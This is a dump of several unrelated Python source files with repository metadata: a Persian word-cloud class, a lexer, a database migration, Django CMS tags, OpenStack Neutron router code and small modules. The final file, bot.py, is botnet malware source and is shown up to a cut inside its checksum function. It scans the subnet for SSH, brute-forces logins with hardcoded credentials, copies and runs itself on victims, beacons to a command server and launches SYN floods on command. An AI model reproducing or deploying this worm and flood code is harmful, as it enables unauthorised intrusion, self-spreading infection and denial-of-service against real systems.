| 6,464
|
py
|
Python
|
persian_wordcloud/wordcloud.py
|
mehotkhan/persian-word-cloud
|
d5001db7bfa33de04324831b5debde3e6548f6a5
|
[
"MIT"
] | 63
|
2018-01-13T14:45:52.000Z
|
2022-03-25T18:18:40.000Z
|
persian_wordcloud/wordcloud.py
|
mehotkhan/persian-word-cloud
|
d5001db7bfa33de04324831b5debde3e6548f6a5
|
[
"MIT"
] | 3
|
2018-03-24T23:53:04.000Z
|
2021-03-18T16:03:11.000Z
|
persian_wordcloud/wordcloud.py
|
mehotkhan/persian-word-cloud
|
d5001db7bfa33de04324831b5debde3e6548f6a5
|
[
"MIT"
] | 16
|
2018-04-03T10:16:11.000Z
|
2022-01-23T19:15:28.000Z
|
# Author: Andreas Christian Mueller <t3kcit@gmail.com>
#
# (c) 2012
# Modified by: Paul Nechifor <paul@nechifor.net>
#
# License: MIT
from __future__ import division
import re
import sys
from arabic_reshaper import arabic_reshaper
from bidi.algorithm import get_display
import warnings
from random import Random
import os
from operator import itemgetter
from wordcloud import WordCloud
from wordcloud.tokenization import unigrams_and_bigrams, process_tokens
from wordcloud.wordcloud import colormap_color_func
class PersianWordCloud(WordCloud):
def __init__(self, font_path=None, only_persian=False, width=400, height=200, margin=2,
ranks_only=None, prefer_horizontal=.9, mask=None, scale=1,
color_func=None, max_words=200, min_font_size=4,
stopwords=None, random_state=None, background_color='black',
max_font_size=None, font_step=1, mode="RGB",
relative_scaling=.5, regexp=None, collocations=True,
colormap=None, normalize_plurals=True):
super(PersianWordCloud, self).__init__(font_path, width, height, margin,
ranks_only, prefer_horizontal, mask, scale,
color_func, max_words, min_font_size,
stopwords, random_state, background_color,
max_font_size, font_step, mode,
relative_scaling, regexp, collocations,
colormap, normalize_plurals)
if font_path is None:
font_path = FONT_PATH
if color_func is None and colormap is None:
# we need a color map
import matplotlib
version = matplotlib.__version__
if version[0] < "2" and version[2] < "5":
colormap = "hsv"
else:
colormap = "viridis"
self.only_persian = only_persian
self.colormap = colormap
self.collocations = collocations
self.font_path = font_path
self.width = width
self.height = height
self.margin = margin
self.prefer_horizontal = prefer_horizontal
self.mask = mask
self.scale = scale
self.color_func = color_func or colormap_color_func(colormap)
self.max_words = max_words
self.stopwords = stopwords if stopwords is not None else STOPWORDS
self.min_font_size = min_font_size
self.font_step = font_step
self.regexp = regexp
if isinstance(random_state, int):
random_state = Random(random_state)
self.random_state = random_state
self.background_color = background_color
self.max_font_size = max_font_size
self.mode = mode
if relative_scaling < 0 or relative_scaling > 1:
raise ValueError("relative_scaling needs to be "
"between 0 and 1, got %f." % relative_scaling)
self.relative_scaling = relative_scaling
if ranks_only is not None:
warnings.warn("ranks_only is deprecated and will be removed as"
" it had no effect. Look into relative_scaling.",
DeprecationWarning)
self.normalize_plurals = normalize_plurals
def process_text(self, text):
"""Splits a long text into words, eliminates the stopwords.
Parameters
----------
text : string
The text to be processed.
Returns
-------
words : dict (string, int)
Word tokens with associated frequency.
..versionchanged:: 1.2.2
Changed return type from list of tuples to dict.
Notes
-----
There are better ways to do word tokenization, but I don't want to
include all those things.
"""
stopwords = set([i.lower() for i in self.stopwords])
flags = (re.UNICODE if sys.version < '3' and type(text) is unicode
else 0)
regexp = self.regexp if self.regexp is not None else r"\w[\w']+"
words = re.findall(regexp, text, flags)
# remove stopwords
words = [word for word in words if word.lower() not in stopwords]
# remove 's
words = [word[:-2] if word.lower().endswith("'s") else word
for word in words]
# remove numbers
words = [word for word in words if not word.isdigit()]
# remove arabic characters
if self.only_persian:
words = [self.remove_ar(word) for word in words]
if self.collocations:
word_counts = unigrams_and_bigrams(words, self.normalize_plurals)
else:
word_counts, _ = process_tokens(words, self.normalize_plurals)
return word_counts
def generate(self, text):
"""Generate wordcloud from text.
The input "text" is expected to be a natural text. If you pass a sorted
list of words, words will appear in your output twice. To remove this
duplication, set ``collocations=False``.
Alias to generate_from_text.
Calls process_text and generate_from_frequencies.
Returns
-------
self
"""
# reshape persian words
text = get_display(arabic_reshaper.reshape(text))
return self.generate_from_text(text)
@staticmethod
def remove_ar(text):
dic = {
'ك': 'ک',
'دِ': 'د',
'بِ': 'ب',
'زِ': 'ز',
'ذِ': 'ذ',
'شِ': 'ش',
'سِ': 'س',
'ى': 'ی',
'ي': 'ی'
}
pattern = "|".join(map(re.escape, dic.keys()))
return re.sub(pattern, lambda m: dic[m.group()], text)
item1 = itemgetter(1)
FONT_PATH = os.environ.get("FONT_PATH", os.path.join(os.path.dirname(__file__),
"fonts/Vazir-Light.ttf"))
stop_words_reshape = get_display(arabic_reshaper.reshape(open(
(os.path.join(os.path.dirname(__file__), 'stopwords')), encoding='utf-8').read()))
STOPWORDS = set([x.strip() for x in stop_words_reshape.split('\n')])
def add_stop_words(words):
for word in words:
words_reshape = get_display(arabic_reshaper.reshape(word))
STOPWORDS.add(words_reshape)
return STOPWORDS
| 36.314607
| 91
| 0.587407
|
6e6c5e3ea9426525e986b3a1c3dc8388e9156331
| 812
|
py
|
Python
|
crayonLexer.py
|
bmilts/Crayon-Toy-language
|
9445e4c2a3623b328f398837808b9005ec0e8af5
|
[
"FTL",
"CNRI-Python"
] | null | null | null |
crayonLexer.py
|
bmilts/Crayon-Toy-language
|
9445e4c2a3623b328f398837808b9005ec0e8af5
|
[
"FTL",
"CNRI-Python"
] | null | null | null |
crayonLexer.py
|
bmilts/Crayon-Toy-language
|
9445e4c2a3623b328f398837808b9005ec0e8af5
|
[
"FTL",
"CNRI-Python"
] | null | null | null |
import sys
import re
# Takes chars and expression functions and compares them to python regular expressions
def lex(chars, expressionToks):
pos = 0
tokens = []
while pos < len(chars):
match = None
for expressionTok in expressionToks:
pattern, marker = expressionTok
regex = re.compile(pattern)
match = regex.match(chars, pos)
if match:
text = match.group(0)
if marker:
token = (text, marker)
tokens.append(token)
break
# Error checking
if not match:
sys.stderr.write('Unaccepted crayon char: %s\\n' % chars[pos])
sys.exit(1)
else:
pos = match.end(0)
return tokens
| 28
| 86
| 0.519704
|
a14aa1f495ca11704f87c87ac68502f66c9e2de1
| 454
|
py
|
Python
|
module_build_service/migrations/versions/edb537dd1e8c_.py
|
zhongtianxie/fm-orchestrator
|
5ab39bf1981cf4abdf7ca4c2a7d4a6120f1bea2f
|
[
"MIT"
] | null | null | null |
module_build_service/migrations/versions/edb537dd1e8c_.py
|
zhongtianxie/fm-orchestrator
|
5ab39bf1981cf4abdf7ca4c2a7d4a6120f1bea2f
|
[
"MIT"
] | null | null | null |
module_build_service/migrations/versions/edb537dd1e8c_.py
|
zhongtianxie/fm-orchestrator
|
5ab39bf1981cf4abdf7ca4c2a7d4a6120f1bea2f
|
[
"MIT"
] | null | null | null |
"""Add cg_build_koji_tag
Revision ID: edb537dd1e8c
Revises: c11a3cfec2a9
Create Date: 2017-09-22 13:50:41.433144
"""
# revision identifiers, used by Alembic.
revision = 'edb537dd1e8c'
down_revision = 'c11a3cfec2a9'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('module_builds', sa.Column('cg_build_koji_tag', sa.String(), nullable=True))
def downgrade():
op.drop_column('module_builds', 'cg_build_koji_tag')
| 19.73913
| 94
| 0.753304
|
8ca9c6b69bde877de08aae558319a926b1f309d7
| 63
|
py
|
Python
|
hypertools/external/__init__.py
|
jeremymanning/hypertools
|
1b39b41aaa634e816d73635e0b9b773f1ed6e709
|
[
"MIT"
] | 1
|
2019-08-11T18:25:18.000Z
|
2019-08-11T18:25:18.000Z
|
hypertools/external/__init__.py
|
jeremymanning/hypertools
|
1b39b41aaa634e816d73635e0b9b773f1ed6e709
|
[
"MIT"
] | 33
|
2020-05-12T01:21:05.000Z
|
2021-12-07T16:13:42.000Z
|
hypertools/external/__init__.py
|
jeremymanning/hypertools
|
1b39b41aaa634e816d73635e0b9b773f1ed6e709
|
[
"MIT"
] | null | null | null |
from .brainiak import SRM, DetSRM, RSRM
from .ppca import PPCA
| 21
| 39
| 0.777778
|
4710cd3784507486f0c6819572483941f49a0173
| 2,392
|
py
|
Python
|
cmsplugin_cascade/templatetags/cascade_tags.py
|
gitter-badger/djangocms-cascade
|
ac293b11d5bc1f8cb73a7c2e7697eaaa6c937e1f
|
[
"MIT"
] | 1
|
2022-01-11T07:21:17.000Z
|
2022-01-11T07:21:17.000Z
|
cmsplugin_cascade/templatetags/cascade_tags.py
|
gitter-badger/djangocms-cascade
|
ac293b11d5bc1f8cb73a7c2e7697eaaa6c937e1f
|
[
"MIT"
] | null | null | null |
cmsplugin_cascade/templatetags/cascade_tags.py
|
gitter-badger/djangocms-cascade
|
ac293b11d5bc1f8cb73a7c2e7697eaaa6c937e1f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django import template
from django.core.cache import caches
from django.template.exceptions import TemplateSyntaxError
from django.contrib.staticfiles import finders
from classytags.arguments import Argument
from classytags.core import Options, Tag
register = template.Library()
class StrideRenderer(Tag):
"""
Render the serialized content of a placeholder field using the full cascade of plugins.
{% render_cascade "cascade-data.json" %}
Keyword arguments:
datafile -- Filename containing the cascade tree. Must be file locatable by Django's
static file finders.
"""
name = 'render_cascade'
options = Options(
Argument('datafile'),
)
def render_tag(self, context, datafile):
from sekizai.helpers import get_varname
from cmsplugin_cascade.strides import StrideContentRenderer
jsonfile = finders.find(datafile)
if not jsonfile:
raise IOError("Unable to find file: {}".format(datafile))
with open(jsonfile) as fp:
tree_data = json.load(fp)
content_renderer = StrideContentRenderer(context['request'])
with context.push(cms_content_renderer=content_renderer):
content = content_renderer.render_cascade(context, tree_data)
# some templates use Sekizai's templatetag `addtoblock` or `add_data`, which have to be re-added to the context
cache = caches['default']
if cache:
varname = get_varname()
SEKIZAI_CONTENT_HOLDER = cache.get_or_set(varname, context.get(varname))
if SEKIZAI_CONTENT_HOLDER:
for name in SEKIZAI_CONTENT_HOLDER:
context[varname][name] = SEKIZAI_CONTENT_HOLDER[name]
return content
register.tag('render_cascade', StrideRenderer)
class RenderPlugin(Tag):
name = 'render_plugin'
options = Options(
Argument('plugin')
)
def render_tag(self, context, plugin):
if not plugin:
return ''
content_renderer = context['cms_content_renderer']
content = content_renderer.render_plugin(
instance=plugin,
context=context,
editable=content_renderer.user_is_on_edit_mode(),
)
return content
register.tag('render_plugin', RenderPlugin)
| 30.666667
| 119
| 0.67893
|
271824b3d1aa819d47caf8cdf26f4def587455ed
| 365
|
py
|
Python
|
opendc/api/v1/specifications/memories/endpoint.py
|
kl1de/kl1de
|
5dc37467b48b4f7dc74292b79fc93a41a93112d0
|
[
"MIT"
] | 2
|
2017-01-24T12:28:51.000Z
|
2017-01-25T15:12:26.000Z
|
opendc/api/v1/specifications/memories/endpoint.py
|
kl1de/kl1de
|
5dc37467b48b4f7dc74292b79fc93a41a93112d0
|
[
"MIT"
] | 7
|
2017-03-15T08:47:21.000Z
|
2018-11-28T10:36:41.000Z
|
opendc/api/v1/specifications/memories/endpoint.py
|
atlarge-research/opendc-web-server
|
71aa937a9b7db7289d69ac85587387070d2af851
|
[
"MIT"
] | 1
|
2017-01-25T15:12:44.000Z
|
2017-01-25T15:12:44.000Z
|
from opendc.models.memory import Memory
from opendc.util.rest import Response
def GET(request):
"""Get a list of the specifications of all Memories."""
# Get the Memories
memories = Memory.query()
# Return the Memories
return Response(
200,
'Successfully retrieved Memories.',
[x.to_JSON() for x in memories]
)
| 19.210526
| 59
| 0.649315
|
ac0b53c300da1ffd46810da150d122f23a5a6e98
| 10,359
|
py
|
Python
|
neutron/agent/l3/dvr_edge_router.py
|
freyes/neutron
|
197c222acb0390728106a083d1663f2c06427518
|
[
"Apache-2.0"
] | null | null | null |
neutron/agent/l3/dvr_edge_router.py
|
freyes/neutron
|
197c222acb0390728106a083d1663f2c06427518
|
[
"Apache-2.0"
] | null | null | null |
neutron/agent/l3/dvr_edge_router.py
|
freyes/neutron
|
197c222acb0390728106a083d1663f2c06427518
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib import constants as l3_constants
from oslo_log import log as logging
from neutron._i18n import _LE
from neutron.agent.l3 import dvr_local_router
from neutron.agent.l3 import dvr_snat_ns
from neutron.agent.l3 import router_info as router
from neutron.agent.linux import ip_lib
from neutron.agent.linux import iptables_manager
LOG = logging.getLogger(__name__)
class DvrEdgeRouter(dvr_local_router.DvrLocalRouter):
def __init__(self, agent, host, *args, **kwargs):
super(DvrEdgeRouter, self).__init__(agent, host, *args, **kwargs)
self.snat_namespace = None
self.snat_iptables_manager = None
def external_gateway_added(self, ex_gw_port, interface_name):
super(DvrEdgeRouter, self).external_gateway_added(
ex_gw_port, interface_name)
if self._is_this_snat_host():
self._create_dvr_gateway(ex_gw_port, interface_name)
# NOTE: When a router is created without a gateway the routes get
# added to the router namespace, but if we wanted to populate
# the same routes to the snat namespace after the gateway port
# is added, we need to call routes_updated here.
self.routes_updated([], self.router['routes'])
def external_gateway_updated(self, ex_gw_port, interface_name):
if not self._is_this_snat_host():
# no centralized SNAT gateway for this node/agent
LOG.debug("not hosting snat for router: %s", self.router['id'])
if self.snat_namespace:
LOG.debug("SNAT was rescheduled to host %s. Clearing snat "
"namespace.", self.router.get('gw_port_host'))
return self.external_gateway_removed(
ex_gw_port, interface_name)
return
if not self.snat_namespace:
# SNAT might be rescheduled to this agent; need to process like
# newly created gateway
return self.external_gateway_added(ex_gw_port, interface_name)
else:
self._external_gateway_added(ex_gw_port,
interface_name,
self.snat_namespace.name,
preserve_ips=[])
def _external_gateway_removed(self, ex_gw_port, interface_name):
super(DvrEdgeRouter, self).external_gateway_removed(ex_gw_port,
interface_name)
if not self._is_this_snat_host() and not self.snat_namespace:
# no centralized SNAT gateway for this node/agent
LOG.debug("not hosting snat for router: %s", self.router['id'])
return
self.driver.unplug(interface_name,
bridge=self.agent_conf.external_network_bridge,
namespace=self.snat_namespace.name,
prefix=router.EXTERNAL_DEV_PREFIX)
def external_gateway_removed(self, ex_gw_port, interface_name):
self._external_gateway_removed(ex_gw_port, interface_name)
if self.snat_namespace:
self.snat_namespace.delete()
self.snat_namespace = None
def internal_network_added(self, port):
super(DvrEdgeRouter, self).internal_network_added(port)
# TODO(gsagie) some of this checks are already implemented
# in the base class, think how to avoid re-doing them
if not self._is_this_snat_host():
return
sn_port = self.get_snat_port_for_internal_port(port)
if not sn_port:
return
ns_name = dvr_snat_ns.SnatNamespace.get_snat_ns_name(self.router['id'])
interface_name = self._get_snat_int_device_name(sn_port['id'])
self._internal_network_added(
ns_name,
sn_port['network_id'],
sn_port['id'],
sn_port['fixed_ips'],
sn_port['mac_address'],
interface_name,
dvr_snat_ns.SNAT_INT_DEV_PREFIX,
mtu=sn_port.get('mtu'))
def _dvr_internal_network_removed(self, port):
super(DvrEdgeRouter, self)._dvr_internal_network_removed(port)
if not self.ex_gw_port:
return
sn_port = self.get_snat_port_for_internal_port(port, self.snat_ports)
if not sn_port:
return
if not self._is_this_snat_host():
return
snat_interface = self._get_snat_int_device_name(sn_port['id'])
ns_name = self.snat_namespace.name
prefix = dvr_snat_ns.SNAT_INT_DEV_PREFIX
if ip_lib.device_exists(snat_interface, namespace=ns_name):
self.driver.unplug(snat_interface, namespace=ns_name,
prefix=prefix)
def _plug_snat_port(self, port):
interface_name = self._get_snat_int_device_name(port['id'])
self._internal_network_added(
self.snat_namespace.name, port['network_id'],
port['id'], port['fixed_ips'],
port['mac_address'], interface_name,
dvr_snat_ns.SNAT_INT_DEV_PREFIX,
mtu=port.get('mtu'))
def _create_dvr_gateway(self, ex_gw_port, gw_interface_name):
"""Create SNAT namespace."""
snat_ns = self._create_snat_namespace()
# connect snat_ports to br_int from SNAT namespace
for port in self.get_snat_interfaces():
# create interface_name
self._plug_snat_port(port)
self._external_gateway_added(ex_gw_port, gw_interface_name,
snat_ns.name, preserve_ips=[])
self.snat_iptables_manager = iptables_manager.IptablesManager(
namespace=snat_ns.name,
use_ipv6=self.use_ipv6)
def _create_snat_namespace(self):
# TODO(mlavalle): in the near future, this method should contain the
# code in the L3 agent that creates a gateway for a dvr. The first step
# is to move the creation of the snat namespace here
self.snat_namespace = dvr_snat_ns.SnatNamespace(self.router['id'],
self.agent_conf,
self.driver,
self.use_ipv6)
self.snat_namespace.create()
return self.snat_namespace
def _get_snat_int_device_name(self, port_id):
long_name = dvr_snat_ns.SNAT_INT_DEV_PREFIX + port_id
return long_name[:self.driver.DEV_NAME_LEN]
def _is_this_snat_host(self):
host = self.router.get('gw_port_host')
if not host:
LOG.debug("gw_port_host missing from router: %s",
self.router['id'])
return host == self.host
def _handle_router_snat_rules(self, ex_gw_port, interface_name):
super(DvrEdgeRouter, self)._handle_router_snat_rules(
ex_gw_port, interface_name)
if not self._is_this_snat_host():
return
if not self.get_ex_gw_port():
return
if not self.snat_iptables_manager:
LOG.debug("DVR router: no snat rules to be handled")
return
with self.snat_iptables_manager.defer_apply():
self._empty_snat_chains(self.snat_iptables_manager)
# NOTE: DVR adds the jump to float snat via super class,
# but that is in the router namespace and not snat.
self._add_snat_rules(ex_gw_port, self.snat_iptables_manager,
interface_name)
def update_routing_table(self, operation, route):
if self.get_ex_gw_port() and self._is_this_snat_host():
ns_name = dvr_snat_ns.SnatNamespace.get_snat_ns_name(
self.router['id'])
# NOTE: For now let us apply the static routes both in SNAT
# namespace and Router Namespace, to reduce the complexity.
ip_wrapper = ip_lib.IPWrapper(namespace=ns_name)
if ip_wrapper.netns.exists(ns_name):
super(DvrEdgeRouter, self)._update_routing_table(
operation, route, namespace=ns_name)
else:
LOG.error(_LE("The SNAT namespace %s does not exist for "
"the router."), ns_name)
super(DvrEdgeRouter, self).update_routing_table(operation, route)
def delete(self, agent):
super(DvrEdgeRouter, self).delete(agent)
if self.snat_namespace:
self.snat_namespace.delete()
def process_address_scope(self):
super(DvrEdgeRouter, self).process_address_scope()
if not self._is_this_snat_host():
return
if not self.snat_iptables_manager:
LOG.debug("DVR router: no snat rules to be handled")
return
# Prepare address scope iptables rule for dvr snat interfaces
internal_ports = self.get_snat_interfaces()
ports_scopemark = self._get_port_devicename_scopemark(
internal_ports, self._get_snat_int_device_name)
# Prepare address scope iptables rule for external port
external_port = self.get_ex_gw_port()
if external_port:
external_port_scopemark = self._get_port_devicename_scopemark(
[external_port], self.get_external_device_name)
for ip_version in (l3_constants.IP_VERSION_4,
l3_constants.IP_VERSION_6):
ports_scopemark[ip_version].update(
external_port_scopemark[ip_version])
with self.snat_iptables_manager.defer_apply():
self._add_address_scope_mark(
self.snat_iptables_manager, ports_scopemark)
| 42.805785
| 79
| 0.633555
|
1c34696f1cfdec0956bb16ca716e88db0d45eff0
| 45
|
py
|
Python
|
agescx/utilities/__init__.py
|
dderevjanik/agescx
|
32e1b11c7c4205a63a156b0014ec7143c0d0c13b
|
[
"MIT"
] | 15
|
2016-02-08T19:35:46.000Z
|
2021-11-24T06:52:04.000Z
|
agescx/utilities/__init__.py
|
heinezen/agescx
|
32e1b11c7c4205a63a156b0014ec7143c0d0c13b
|
[
"MIT"
] | 1
|
2016-01-03T02:54:46.000Z
|
2016-01-03T02:54:46.000Z
|
agescx/utilities/__init__.py
|
heinezen/agescx
|
32e1b11c7c4205a63a156b0014ec7143c0d0c13b
|
[
"MIT"
] | 5
|
2016-10-05T03:55:29.000Z
|
2021-05-14T10:15:57.000Z
|
from .decoder import *
from .encoder import *
| 22.5
| 22
| 0.755556
|
5f8ef0d30ea7eb454525b9370023c18314ca6299
| 424
|
py
|
Python
|
mine/models/_bases.py
|
jacebrowning/mine
|
33b21f075f2f65678ce050dc74285a0b6f55ab0c
|
[
"MIT"
] | 18
|
2015-04-25T05:31:05.000Z
|
2020-02-28T20:58:42.000Z
|
mine/models/_bases.py
|
jacebrowning/mine
|
33b21f075f2f65678ce050dc74285a0b6f55ab0c
|
[
"MIT"
] | 47
|
2015-01-03T00:20:29.000Z
|
2021-12-01T11:16:48.000Z
|
mine/models/_bases.py
|
jacebrowning/mine
|
33b21f075f2f65678ce050dc74285a0b6f55ab0c
|
[
"MIT"
] | 1
|
2016-01-02T04:05:27.000Z
|
2016-01-02T04:05:27.000Z
|
"""Shared base classes and mixins."""
class NameMixin:
"""Mixin class for objects identified by their name."""
def __str__(self):
return str(self.name) # type: ignore
def __eq__(self, other):
return str(self).lower() == str(other).lower()
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
return str(self).lower() < str(other).lower()
| 23.555556
| 59
| 0.617925
|
499eb942c0be3e944026fc5611c0c991a8756701
| 1,122
|
py
|
Python
|
applications/ShallowWaterApplication/python_scripts/semi_lagrangian_shallow_water_solver.py
|
alecontri/Kratos
|
9a003679c1a12a159466e6e61a371e1286f379ca
|
[
"BSD-4-Clause"
] | 778
|
2017-01-27T16:29:17.000Z
|
2022-03-30T03:01:51.000Z
|
applications/ShallowWaterApplication/python_scripts/semi_lagrangian_shallow_water_solver.py
|
alecontri/Kratos
|
9a003679c1a12a159466e6e61a371e1286f379ca
|
[
"BSD-4-Clause"
] | 6,634
|
2017-01-15T22:56:13.000Z
|
2022-03-31T15:03:36.000Z
|
applications/ShallowWaterApplication/python_scripts/semi_lagrangian_shallow_water_solver.py
|
philbucher/Kratos
|
1ceb900dbacfab344e27e32285250eafc52093ec
|
[
"BSD-4-Clause"
] | 224
|
2017-02-07T14:12:49.000Z
|
2022-03-06T23:09:34.000Z
|
# importing the Kratos Library
import KratosMultiphysics as KM
import KratosMultiphysics.ShallowWaterApplication as SW
## Import base class file
from KratosMultiphysics.ShallowWaterApplication.free_surface_shallow_water_solver import FreeSurfaceShallowWaterSolver
def CreateSolver(model, custom_settings):
return SemiLagrangianShallowWaterSolver(model, custom_settings)
class SemiLagrangianShallowWaterSolver(FreeSurfaceShallowWaterSolver):
def __init__(self, model, settings):
super().__init__(model, settings)
self.min_buffer_size = 2
self.element_name = "LagrangianSWE"
self.condition_name = "LineCondition"
def AddVariables(self):
super().AddVariables()
self.main_model_part.AddNodalSolutionStepVariable(SW.PROJECTED_SCALAR)
def Initialize(self):
super().Initialize()
self.bfecc = SW.BFECCConvectionUtility(self.GetComputingModelPart())
def InitializeSolutionStep(self):
self.bfecc.Convect(KM.MOMENTUM, KM.VELOCITY)
self.bfecc.CopyVariableToPreviousTimeStep(KM.MOMENTUM)
super().InitializeSolutionStep()
| 37.4
| 118
| 0.76738
|
7423c07c59801b0e5e7c9bd7def69adf8c4334e2
| 12,526
|
py
|
Python
|
bot.py
|
mhy001/Khala_Botnet
|
0a8fdb2144f78ce91cdd8a354a7e54bc1e16928f
|
[
"MIT"
] | null | null | null |
bot.py
|
mhy001/Khala_Botnet
|
0a8fdb2144f78ce91cdd8a354a7e54bc1e16928f
|
[
"MIT"
] | null | null | null |
bot.py
|
mhy001/Khala_Botnet
|
0a8fdb2144f78ce91cdd8a354a7e54bc1e16928f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
"""bot.py
External Dependencies:
nmap for network mapping
paramiko for ssh & sftp
"""
# standard lib
import logging
import os
import random
import socket
import stat
import struct
import subprocess
import sys
import threading
import time
# third-party lib
import nmap
import paramiko
# CONSTANTS
MASTER = '192.168.1.3' # C2 server IPv4 address
PORT = 1337
ID = socket.gethostbyname(socket.gethostname())
BOT_FILE_PATH = '/tmp/bot.py'
DELIMITER = '::'
MAX_THREAD = 100 # must be less than max thread limit
# GLOBALS
state = -1 # 0 ready, 1 attacking, 2 enrolled for attack, 3 stop attacking
credentials = [
('ubuntu', 'ubuntu'),
('pi', 'raspberry'),
('admin', 'password'),
('cpsc', 'cpsc')
]
logging.basicConfig(level=logging.INFO,
format='%(asctime)s PID:%(process)d %(threadName)s %(message)s',
datefmt='%H:%M:%S',
filename='/tmp/bot.log')
logger = logging.getLogger('')
##################################################################
# WORM
# A simple ssh worm that:
# 1. Uses nmap to scan the local subnet for IP systems which have
# ssh open on the default port, 22.
# 2. Attempts to gain access by bruteforce with a pre-set list
# of credentials
# 3. If connected, copy self to the victim and begin execution
# on the victim
##################################################################
def access_system(host):
""" Perform a brute force attack against a host system
@param host: hostname/ip of target system
@return: tuple of instance of paramiko SSH class, successful username,
succesful password; None otherwise
"""
global credentials
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logger.info('Accessing {}'.format(host))
for (username, password) in credentials:
result = try_credentials(host, username, password, ssh)
if result == 0:
return (ssh, username, password)
logger.info('Could not access {}'.format(host))
return None
def get_targets(subnet):
""" Get list of target systems
@param subnet: the target subnet; example '192.168.1.1/24'
@return: list of potential target hosts with default ssh port open, 22
"""
nm = nmap.PortScanner()
hosts = []
nm.scan(subnet, arguments='-p 22 --open')
hosts = nm.all_hosts()
targets = []
for host in hosts:
if nm[host].state() == 'up' and host != MASTER and \
host != ID and not host.startswith('127.'):
targets.append(host)
return targets
def spread(sshclient):
""" Spread to target victim system and start the bot
@param sshclient: instance of paramiko SSH class connected to a system
"""
sftp = sshclient.open_sftp()
sftp.put(os.path.abspath(sys.argv[0]), BOT_FILE_PATH)
sftp.chmod(BOT_FILE_PATH, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)
sftp.close()
sshclient.exec_command('python ' + BOT_FILE_PATH)
#sshclient.exec_command('python3 ' + BOT_FILE_PATH)
def try_credentials(host, username, password, sshclient):
""" Try connecting to a host with a set of credentials
@param host: hostname/ip of target system
@param username: username to try
@param password: password to try
@param sshclient: instance of paramiko SSH class
@return: 0 for success; -1 for socket error;
1 for wrong credentials, maybe
"""
try:
sshclient.connect(host, username=username, password=password)
except paramiko.AuthenticationException:
return 1
except paramiko.SSHException:
return 1
except socket.error:
return -1
return 0
def worm_driver(target):
""" Driver for the worm
@param target: ipv4 address of beginning target
@side-effect: when done, sets bot state to ready
"""
logger.info('LOADING WORM')
global state
state = 1
targets = get_targets(target + '/24')
logger.info('worm targets: {}'.format(targets))
for target in targets:
sshInfo = access_system(target)
if sshInfo:
sftp = sshInfo[0].open_sftp()
try:
sftp.get(BOT_FILE_PATH, '/tmp/' + target + '.txt')
logger.info('{} is a friend'.format(target))
except IOError:
logger.info('Infecting {}'.format(target))
spread(sshInfo[0])
finally:
os.remove('/tmp/' + target + '.txt')
sftp.close()
sshInfo[0].close()
state = 0
logger.info('TERMINATING WORM')
##################################################################
# BOT
# Communication is transmitted via UDP
# Messages accepted from C2 server:
# 'ROLL': roll call to check for bot's state
# 'ATCK': launch an attack; see atck_command for more details
# 'STOP': terminate active attacks
# Messages sent to C2 server:
# 'HELO': tells the C2 server that bot is up
# 'REDY': response to 'ROLL' for bot in ready state
# 'BUSY': response to 'ROLL' for bot not in ready state
# NOTE: raw sockets & scapy module require root privileges
##################################################################
def atck_command(tokens):
""" Processes an attack message from the C2 server
Attack 0: spread bot
Attack 1: syn flood
NOTE: remember to check for stopping state in the attacks and
to reset to ready state when attack ends
@param tokens: tokenized attack command in the following format:
['ATCK', <int for attack type>, <target IPv4 address>]
@side-effect: sets bot state to attacking
"""
global state
if state != 2: # check for enrolled state
return
try:
atck_type = int(tokens[1])
target = tokens[2]
state = 1
logger.info('Starting attack {} on {}'.format(atck_type, target))
if target == MASTER or target.startswith('127.'):
state = 0
return
if atck_type == 0: # spread the bot, ignores stop command
worm_driver(target)
elif atck_type == 1: # syn flood
syn_flood(target)
except (ValueError, IndexError):
return
def hello():
""" Sends a 'HELO' message to the C2 server every minute
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
sock.sendto('HELO', (MASTER, PORT))
#sock.sendto(bytes('HELO', 'utf-8'), (MASTER, PORT))
time.sleep(60)
sock.close()
def process_commands(message):
""" Processes commands received from the C2 server
@param message: message from the C2 server
"""
tokens = message.split(DELIMITER)
command = tokens[0]
if command == 'ROLL':
roll_command()
elif command == 'ATCK':
atck_command(tokens)
elif command == 'STOP':
stop_command()
else:
return
def roll_command():
""" Sends a 'REDY' message if bot is in ready state, 'BUSY' otherwise
"""
global state
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if state == 0:
state = 2
sock.sendto('REDY', (MASTER, PORT))
#sock.sendto(bytes('REDY', 'utf-8'), (MASTER, PORT))
else:
sock.sendto('BUSY', (MASTER, PORT))
#sock.sendto(bytes('BUSY', 'utf-8'), (MASTER, PORT))
sock.close()
def stop_command():
""" Terminate any active attacks
@side- effect: sets bot state to ready
"""
global state
state = 3
time.sleep(5) # should be long enough for attack threads to see stop state
state = 0
def syn_flood(target):
""" Perform a syn flood on target system
@param target: IPv4 of system to attack
"""
count = 0
while state == 1 and count < MAX_THREAD:
count = count + 1
threading.Thread(target=tcp_syn, args=(target,)).start()
def bot_driver():
""" Driver for the bot
"""
logger.info('LOADING BOT')
global state
threading.Thread(target=hello).start()
master_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
master_sock.bind(('', PORT))
#state = 0 # don't set bot to ready yet. potential race condition with worm driver
while True:
message = master_sock.recv(1024)
logger.info('Received: {}'.format(message))
threading.Thread(target=process_commands, args=(message,)).start()
master_sock.close()
##################################################################
# SYN FLOOD
##################################################################
def calculate_tcp_checksum(message):
""" Calculate the TCP checksum
@param message: payload + TCP headers + pseudoheader
@return: 16-bit TCP checksum value
"""
cs = 0
for i in range(0, len(message), 2):
w = (ord(message[i])<<8 + ord(message[i+1]))
cs = cs + w
cs = (cs>>16) + (cs & 0xffff)
cs = ~cs & 0xffff
return cs
